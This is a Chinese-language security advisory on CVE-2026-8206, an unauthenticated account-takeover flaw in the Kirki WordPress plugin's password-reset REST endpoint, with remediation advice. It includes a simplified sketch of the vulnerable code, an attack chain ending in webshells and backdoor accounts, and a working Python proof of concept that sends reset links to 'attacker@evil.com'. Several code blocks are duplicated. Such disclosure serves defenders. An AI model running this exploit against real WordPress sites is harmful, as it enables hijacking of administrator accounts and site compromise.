夜雨聆风
CVE-2026-8206CVSS 9.8CISA KEV
漏洞概述
漏洞编号
CVE-2026-8206漏洞类型
未授权账户接管 (Account Takeover)
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Kirki – Customizer Plugins for WordPress 6.0.0-6.0.6
技术细节
Kirki是一款广泛应用于WordPress网站的自定义页面构建和主题定制插件,全球超过50万个网站使用该插件。近日安全研究人员发现该插件存在严重的密码重置逻辑缺陷,允许未经认证的攻击者完全接管任意用户账户,包括管理员账户。
该漏洞位于插件的REST API端点中的handle_forgot_password()函数,具体缺陷如下:
python
# 漏洞代码逻辑(简化示例)
# 位置: CompLibFormHandler class
def handle_forgot_password(self, request):
# 从请求中获取用户名和邮箱参数
username = request.get_param('username')
user_email = request.get_param('email')
# 验证用户名是否存在
user = get_user_by_username(username)
if user:
# 漏洞: 直接使用请求中的邮箱,而非用户注册邮箱
reset_url = generate_reset_token(user)
send_email(user_email, reset_url) # 发送到攻击者邮箱
# 正常逻辑应该检查:
# if user_email == user.registered_email:
# send_email(user.registered_email, reset_url)
# 位置: CompLibFormHandler class
def handle_forgot_password(self, request):
# 从请求中获取用户名和邮箱参数
username = request.get_param('username')
user_email = request.get_param('email')
# 验证用户名是否存在
user = get_user_by_username(username)
if user:
# 漏洞: 直接使用请求中的邮箱,而非用户注册邮箱
reset_url = generate_reset_token(user)
send_email(user_email, reset_url) # 发送到攻击者邮箱
# 正常逻辑应该检查:
# if user_email == user.registered_email:
# send_email(user.registered_email, reset_url)
安全实现要求密码重置链接只能发送到账户注册时绑定的邮箱地址。但该插件错误地信任了请求中传入的邮箱参数,导致攻击者只需提供目标用户名和一个攻击者控制的邮箱地址,即可将密码重置链接发送至攻击者邮箱。
攻击链分析
步骤一:枚举用户名
攻击者通过用户注册、评论等功能或默认admin账户,识别目标网站的有效用户名
步骤二:构造恶意请求
向插件REST API端点发送POST请求,同时指定目标用户名和攻击者控制的邮箱地址
步骤三:接收重置链接
插件验证用户名后,将密码重置链接发送至攻击者邮箱而非账户真实邮箱
步骤四:账户接管
攻击者使用重置链接设置新密码,登录目标账户获得完全访问权限
步骤五:权限维持
安装恶意插件、创建后门账户或植入webshell,实现持久化控制
PoC / 利用代码
⚠ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。python
# CVE-2026-8206 Kirki WordPress插件账户接管PoC
# 仅供安全研究使用
import requests
import json
def exploit_kirki(target_url, target_username, attacker_email):
# Kirki插件REST API端点
api_endpoint = target_url + "/wp-json/kirki/v1/forgot-password"
# 构造恶意请求载荷
payload = {
"username": target_username, # 目标用户名,如admin
"email": attacker_email # 攻击者控制的邮箱
}
try:
response = requests.post(
api_endpoint,
json=payload,
headers={"Content-Type": "application/json"},
timeout=10
)
if response.status_code == 200:
print("[+] 密码重置请求已发送!")
print("[*] 检查邮箱 {0} 获取重置链接".format(attacker_email))
else:
print("[-] 请求失败,状态码:", response.status_code)
except Exception as e:
print("[-] 错误:", str(e))
# 使用示例
# python exploit.py https://example.com admin attacker@evil.com
# 仅供安全研究使用
import requests
import json
def exploit_kirki(target_url, target_username, attacker_email):
# Kirki插件REST API端点
api_endpoint = target_url + "/wp-json/kirki/v1/forgot-password"
# 构造恶意请求载荷
payload = {
"username": target_username, # 目标用户名,如admin
"email": attacker_email # 攻击者控制的邮箱
}
try:
response = requests.post(
api_endpoint,
json=payload,
headers={"Content-Type": "application/json"},
timeout=10
)
if response.status_code == 200:
print("[+] 密码重置请求已发送!")
print("[*] 检查邮箱 {0} 获取重置链接".format(attacker_email))
else:
print("[-] 请求失败,状态码:", response.status_code)
except Exception as e:
print("[-] 错误:", str(e))
# 使用示例
# python exploit.py https://example.com admin attacker@evil.com
影响范围
Kirki插件版本6.0.0 - 6.0.6受影响
受影响网站数量全球约50万+网站使用该插件,约15万网站运行受影响版本
影响场景任何启用用户注册或开放评论的WordPress网站,尤其暴露用户枚举或登录功能的站点
利用难度极低,无需技术门槛,攻击可自动化大规模实施
防御指南
修复与缓解
- 立即升级:将Kirki插件升级至6.0.7或更高版本
- Wordfence防护:Wordfence Premium用户已于5月9日获得防火墙规则保护,Free版本于6月8日获得保护
- 监控可疑活动:检查密码重置日志,关注异常的密码重置请求模式
- 限制API访问:可通过WAF规则限制对REST API端点的访问
bash
wp plugin update kirki --allow-root
# 或通过WordPress后台更新
# 仪表盘 > 插件 > Kirki Customizer > 更新
# 或通过WordPress后台更新
# 仪表盘 > 插件 > Kirki Customizer > 更新
⚡ 紧急建议
鉴于漏洞利用难度极低且影响面极广,建议所有使用Kirki插件的网站立即检查并更新。如无法立即更新,应启用WAF防护并加强密码重置活动监控。法律声明
以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。
以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。
